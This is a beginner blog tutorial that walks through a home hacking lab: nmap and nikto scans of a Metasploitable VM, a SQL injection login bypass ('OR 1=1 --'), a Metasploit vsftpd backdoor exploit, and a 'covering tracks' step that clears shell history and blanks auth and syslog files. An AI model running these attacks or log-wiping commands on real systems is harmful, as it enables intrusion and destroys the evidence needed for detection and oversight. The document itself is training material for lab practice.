πŸ› ️ Hacking Practice Guide: A Step-by-Step Tutorial for Beginners

Hello! πŸ˜ƒ This guide is designed to help you practice hacking in a structured and easy-to-follow way.

Even if you are new to hacking, you can follow this step-by-step guide and complete the exercises successfully. πŸš€



1️⃣ Setting Up the Practice Environment πŸ—️

1. Installing a Virtual Machine

Hacking practice should be done in a safe, isolated environment, not on a real system.
We will use VirtualBox or VMware to set up virtual machines.

πŸ“Œ Required Software Downloads:

Installation Steps:

  1. Install VirtualBox.
  2. Add Kali Linux and Metasploitable as separate virtual machines.
  3. Set Kali Linux as the attacker machine and Metasploitable as the target server.
  4. Connect both virtual machines to the same network (Host-Only Adapter).

Now, you're all set! πŸŽ‰

2️⃣ Information Gathering (Reconnaissance) πŸ•΅️‍♂️

Before attacking a target, we must first gather information about it.
In this stage, we will find the target system's IP address, open ports, and running services.

πŸ“Œ 1. Finding the Target IP Address

Open the terminal in Kali Linux and run the following command:

bash
netdiscover

πŸ‘‰ This will reveal the IP address of the Metasploitable (target) machine.

πŸ“Œ 2. Scanning for Open Ports

To check which services are running, we use a tool called Nmap.

bash
nmap -sS -A [Target IP]

πŸ‘‰ This command will display open ports and running services.

πŸ’‘ Example Nmap Scan Results:

pgsql
PORT     STATE  SERVICE   VERSION  
22/tcp   open   ssh       OpenSSH 4.3  
80/tcp   open   http      Apache httpd 2.2.8  
3306/tcp open   mysql     MySQL 5.0.51

Now, we know which services (web server, database, etc.) are running on the target system! πŸ‘€

3️⃣ Vulnerability Scanning (Scanning & Enumeration) πŸ”Ž

Now, let's start analyzing the system for vulnerabilities.

πŸ“Œ 1. Checking for Web Server Vulnerabilities

Metasploitable contains intentionally vulnerable web applications.
Open a web browser and visit http://[Target IP].

✅ You will see several vulnerable web applications.
✅ The target we will focus on is "Mutillidae".

Now, let's scan the website for security issues!

bash
nikto -h [Target IP]

πŸ‘‰ Nikto will automatically detect security flaws in the web server.

4️⃣ Exploiting Vulnerabilities (Exploitation) πŸ’₯

Now, let's perform an actual attack.
We will try SQL Injection (database attack) to bypass login authentication.

πŸ“Œ 1. Bypassing Admin Login with SQL Injection

  1. Open the Mutillidae website.
  2. Find the Login page.
  3. Enter the following credentials:
    • Username: ' OR 1=1 --
    • Password: (Leave empty)

πŸ‘‰ Click "Login," and you will successfully log in as an administrator! 🎯

This attack technique is called SQL Injection, where poorly protected web applications allow unauthorized access to the database.

5️⃣ Privilege Escalation πŸš€

Now, let's go beyond web hacking and gain root (administrator) access to the target system.

πŸ“Œ 1. Exploiting a Vulnerability with Metasploit

Open the terminal in Kali Linux and start Metasploit:

bash
msfconsole

Once Metasploit is running, enter the following commands:

bash
use exploit/unix/ftp/vsftpd_234_backdoor  
set RHOSTS [Target IP]  
set PAYLOAD cmd/unix/interact  
exploit

πŸ‘‰ Success! You now have access to the target server! πŸŽ‰

Now, you can execute further attacks inside the system.

6️⃣ Covering Tracks (Hiding Evidence) πŸ•Ά️

Just because you've hacked into a system doesn’t mean your job is done!
To avoid detection, you need to erase logs and hide evidence.

πŸ“Œ 1. Clearing Command History

bash
history -c

πŸ“Œ 2. Deleting Log Files

bash
echo "" > /var/log/auth.log
echo "" > /var/log/syslog

Now, no one will know that you were ever there! 😎

7️⃣ Final Steps: What to Do After Hacking Practice πŸ“

Reset your virtual machine after each practice session!
Always practice in a legally authorized environment.
Use your knowledge to improve security, not to harm others.

Now, you’ve learned the basics of hacking! πŸŽ‰
If you want to go deeper, explore web hacking, system hacking, and network hacking topics.

πŸ”₯ Want to try more advanced hacking exercises? Stay tuned for the next tutorial!

Comments

Post a Comment

Popular posts from this blog

[MaritimeCyberTrend] Relationship and prospects between U.S. Chinese maritime operations and maritime cybersecurity

Image
U.S. Sanctions on Chinese Ships & Cybersecurity Compliance The U.S. Trade Representative (USTR)’s sanctions on Chinese shipping and shipbuilding are expected to heighten the importance of cybersecurity regulations in vessel operations. In particular, as the U.S. increasingly frames Chinese-built ships and shipping companies as cybersecurity risks, compliance with maritime cybersecurity standards will become a critical issue for global shipping stakeholders. The United States is increasingly likely to classify Chinese-built vessels as national security and cybersecurity threats, using this as a basis for additional regulations and sanctions. In particular, drawing from past sanctions on Huawei and ZTE, the U.S. may argue that ships built in Chinese shipyards and equipped with Chinese IT systems (navigation, communication, and monitoring equipment) pose risks to the digital maritime infrastructure of the U.S. and its allies. As a result, the U.S. Coast Guard (USCG) is expected to s...
Read more

인곡지λŠ₯ μ„œλΉ„μŠ€ - 챗봇, 사전에 μΆ©λΆ„ν•œ 지식을 μ „λ‹¬ν•˜κ³  ν•¨κ»˜ ν•™μŠ΅ ν•˜κΈ°!

Image
μš°λ¦¬λŠ” μ•žμ„  글을 톡해 μ„±κ³΅μ μœΌλ‘œ  AI μ„œλΉ„μŠ€λ₯Ό  κ°œλ°œν•˜κ±°λ‚˜ λ„μž…ν•˜λŠ” 것을 λͺ©μ μœΌλ‘œ  ν”„λ‘œμ νŠΈμ˜ 곡식 착수 이전에  λͺ©ν‘œλ‘œ ν•˜λŠ” AI μ„œλΉ„μŠ€μ— λŒ€ν•˜μ—¬, μ†Œμ†λœ 쑰직 λ‚΄λΆ€λŠ” λ¬Όλ‘  κΈ°μ—…λ‚΄ ν˜‘λ ₯이 μš”κ΅¬λ˜λŠ” 쑰직듀  κ°μžκ°€ μ„œλ‘œ λ‹€λ₯Έ μ •μ˜μ™€ κΈ°λŒ€ 효과 그리고 ν™œμš© λ°©μ•ˆμ„ 가지고 있던 상황을 ν•΄κ²°ν•  ν•„μš”κ°€ μžˆλŠ”κ²ƒμ„  μž˜ μ•Œκ³  μžˆμŠ΅λ‹ˆλ‹€. 이λ₯Ό μœ„ν•΄ κ°€μž₯ λ¨Όμ €, 이해 κ΄€κ³„μžλ“€μ΄ κ·Έ 좔진 λ°©ν–₯κ³Ό λͺ©ν‘œλ₯Ό 곡감 ν•  수 μžˆλ„λ‘ 잘  μ•Œλ €μ§„ μ„ ν–‰ 사둀와 수치λ₯Ό ν™œμš©ν•˜μ—¬ ν•„μš”μ„± μΈ‘λ©΄μ—μ„œ 사전 λ…ΌμŸμ„ μœ λ„ ν•˜μ˜€μœΌλ©°  μ•žμœΌλ‘œμ˜ ν”„λ‘œμ νŠΈ 진행 단계 별 좔진 λ°©ν–₯에 λŒ€ν•œ μ˜μ‚¬ κ²°μ •μ˜ 맀 μˆœκ°„  λ§ˆλ‹€ 이해 κ΄€κ³„μžλ“€μ—κ²Œ μ •ν™•ν•œ  정보λ₯Ό 전달 ν•  κ²ƒμž„μ„ μ•”μ‹œμ μœΌλ‘œ ν‘œν˜„ ν•˜κΈ°λ„ ν•˜μ˜€μŠ΅λ‹ˆλ‹€. 이제 남은 것은 κ΄€λ ¨ 뢄야에 κ²½ν—˜μ΄λ‚˜ 지식이 μ—†λŠ” μƒν™©μ—μ„œ 잘λͺ»λœ μ˜μ‚¬ κ²°μ •μ΄λ‚˜ 행동을 미연에 λ°©μ§€ν•˜κΈ° μœ„ν•΄   "사전에  μΆ©λΆ„ν•œ 지식을 μ „λ‹¬ν•˜κ³  ν•¨κ»˜ ν•™μŠ΅ " ν•˜λŠ”  것이라 생각 ν•©λ‹ˆλ‹€. (λ‚˜λ˜ λ‚¨μ΄λ˜ μ•Œλ©΄ μ–Όλ§ˆλ‚˜ 더 μ•Œκ² λŠ”κ°€.. 인터넷 κ²€μƒ‰λ§Œ 해도 λ‹€ λ‚˜μ˜€λŠ” ν•œ μ€Œλ„ λ˜μ§€ μ•ŠλŠ” μ§€μ‹μœΌλ‘œ μžμ‘΄μ‹¬ μ„Έμš°λ € ν•˜μ§€ 말고, ν•¨κ»˜ ν•™μŠ΅ ν•˜λ©° 결과물의 완성도λ₯Ό λ†’μ΄λŠ” λŒ€ νž˜μ“°μž~! 그것이 상생이닀. κΌ°λŒ€κ°€ λ˜μ§€ 말자~!) μ΄λŠ” 본인의 κ²½ν—˜μ„ λ°”νƒ•μœΌλ‘œ μž‘μ„±λœ κΈ€μž„μ„ λ‹€μ‹œ ν•œλ²ˆ 밝히며, μ΄λŸ¬ν•œ 사항이 AI 업계에 쒅사 ν•˜μ‹œλŠ” λΆ„λ“€μ—κ²Œλ„ 도움이 되기λ₯Ό λ°”λΌλŠ” λ§ˆμŒμ—  κ·Έ 사둀λ₯Ό μ†Œκ°œ ν•˜κ³ μž ν•©λ‹ˆλ‹€. (κ΄€λ ¨ μ „λ¬Έ μš©μ–΄λ‚˜ 이미지 등은 ν•˜λ‹¨μ˜ reference 듀을 μ°Έμ‘° ν•˜μ—¬ μž‘μ„± ν•˜μ˜€μŠ΅λ‹ˆλ‹€.) μ±—λ΄‡μ˜ μž‘λ™ 원리 그리고 졜적 μ„±λŠ₯ 확보λ₯Ό μœ„ν•œ λ…Έλ ₯   역은이: In-Sung Lee λͺ¨λ“  챗봇이 μΈκ°„μ˜ μ–Έμ–΄λ₯Ό μ™„λ²½νžˆ μ΄ν•΄ν•˜κ³  μžμ—°μŠ€λŸ½κ²Œ λŒ€ν™”ν•˜λŠ” 것을 λͺ©ν‘œλ‘œ κ°€μ Έμ•Ό ν• κΉŒμš” ? μ•„λ§ˆλ„ μ‚¬λžŒμ²˜λŸΌ λ§ν•˜κ³  λ‹΅λ³€ ν•˜μ§€ μ•ŠλŠ” λ‹¨μˆœ 챗봇이라 ν•˜λ”λΌλ„ 고객의 문제λ₯Ό ν•΄κ²°ν•΄ 쀄 수 μžˆλ‹€λ©΄ κ·Έ 자체둜 μ˜λ―Έκ°€ 있...
Read more

[Curriculum] Sungkyunkwan University - Department of Information Security - Course Sequence by Areas of Interest

Image
The order in which subjects are approached may vary depending on the student's major, interests, and learning goals. However, generally, taking courses in the following sequence allows for efficient learning. (Source: Sungkyunkwan University GSIC ) 1. Basic Courses First, it is essential to understand fundamental theories and basic concepts. The following courses help build foundational knowledge: Introduction to Digital Forensics (FSI5056) : Establishes the basics of digital forensics and teaches various methods for collecting and analyzing digital evidence. Korea University Graduate School of Information Security Introduction to Cryptography (GSIS001) : Covers the fundamental principles and applications of encryption technologies for data protection. Life Coding Database (GSID003) : Introduces key concepts and practical skills for data storage and management. Operating Systems (GSID021) : Helps understand the structure and functions of operating systems, which are the core of com...
Read more